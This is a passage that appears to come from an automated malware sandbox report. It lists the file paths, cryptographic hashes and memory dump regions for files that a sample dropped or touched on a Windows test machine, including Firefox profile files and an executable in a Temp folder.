| SHA256 | 693ef7e861cd9159da536a4f611bce85f0943ace7cfb09bbad83960f83c5b42c |
| SHA512 | 7d61292e442c285a9275c4f060680c8773b2e80b2d8a652d687ba6b94d9ad4112283e18f0a5253e1bd4575199c4692d1f7ab96dca41bb8c823e9b18bfde52a11 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | fb8e1a4f79179685b410ccc493feb488 |
| SHA1 | e8f9f0c60e734313c33c33e0026efe26ad0f9541 |
| SHA256 | 9b203a6b9078008ad91ba0da1d6251241c9e5853e14c69319027315fb985cc33 |
| SHA512 | 9440d04c875225683ae661b3a7bfabe893f6e05df537d00dda936fc72b930f1ae9dab9c7c553bb0d45fd7218d3e631c6881609c99979c2feb5b332f565c4a421 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\prefs.js
| MD5 | 30c18a82bccb56db9919143246de7b0b |
| SHA1 | d2150c8306b6866c0a9a17f3ff0f453e68cbe70e |
| SHA256 | 9549fd7a9b82cc0915fec95b3f6197085e4bdf42c0496a61424e9f869ab6733d |
| SHA512 | 0a24359fd741bdd73aeb957e2b441b137d8bd385b413d0b0abdc8938340690820221326e09257bd5e49078cf88e3eb3cc258b8b4c01c650fffc61a6c3b213ac7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\AlternateServices.bin
| MD5 | f92ebacb935a2886788b25e597b1fb21 |
| SHA1 | e8cb46327daa2d85a5dea1515ec0375b65bcf19e |
| SHA256 | f4fc6c5493db7dcc4db52897c19d5740e51c96b446f7ac3637d9d8d637a27d52 |
| SHA512 | 6851bd17feda7785d5c35b825c3e5080354897053e58600b42f704836325a14569f47dde6968734b704d828fcef401a6b656e0da74aedab158bf076d55c13dc9 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\outbhah2.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZKC1FSM4\soft[1]
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
memory/464-1101-0x00000000009D0000-0x0000000000E42000-memory.dmp
memory/464-1104-0x00000000009D0000-0x0000000000E42000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | afbeeff9e834a84f4d159a23dc75415c |
| SHA1 | c115fa7e7e84a7cf52b874b68178f82a1d82113f |
| SHA256 | 1d38c3105238a12744049011dfdc47d2b4cb8d86c09775b3e22b528d9b44db2b |
| SHA512 | a128b92e9ef605fb2d589d5936b55dcf797fd0e800a6a438ed9a5b1368a0638f0e63c372c0db89687aeaa052f3420314e0ad078906ef640a36527f0938e534a8 |
C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
| MD5 | 3c345db2fa2f45fea77744d2c67395b7 |
| SHA1 | 3364aa7e099de25907cf64a9a05526876b2f456c |
| SHA256 | f3ee964602d42a4a3fe43f466844ced7867da9435ce39b2d7f88ab31d424e8a6 |
| SHA512 | c593932afd38406bcbe8aa92bdeb378bdac8d974cf991cbe1aafe7e49f7a6a64150d3d4a2aacf3489bae028a17e6b38b3aab7a333fa792c3dfee26965ff72f50 |
memory/5424-1161-0x0000000000250000-0x000000000093E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\prefs-1.js
| MD5 | 205f5c11fd49f08ad0720a29fbfb418f |
| SHA1 | 71f626ae4a004e2a88a56709692fc1c43ca27a0e |
| SHA256 | 4e37aa62e92b5934f603eccd92dd86214689f890d4d894b966534aab805a4ae4 |
| SHA512 | c1c8ae38aae6302e0128dbbb2b1c02985a27ff58ac2f438df21af614436b8a014b8119266e21fe9fa1982131df97006fa4f1c1e7ab1ae3f42e162c2113397fc5 |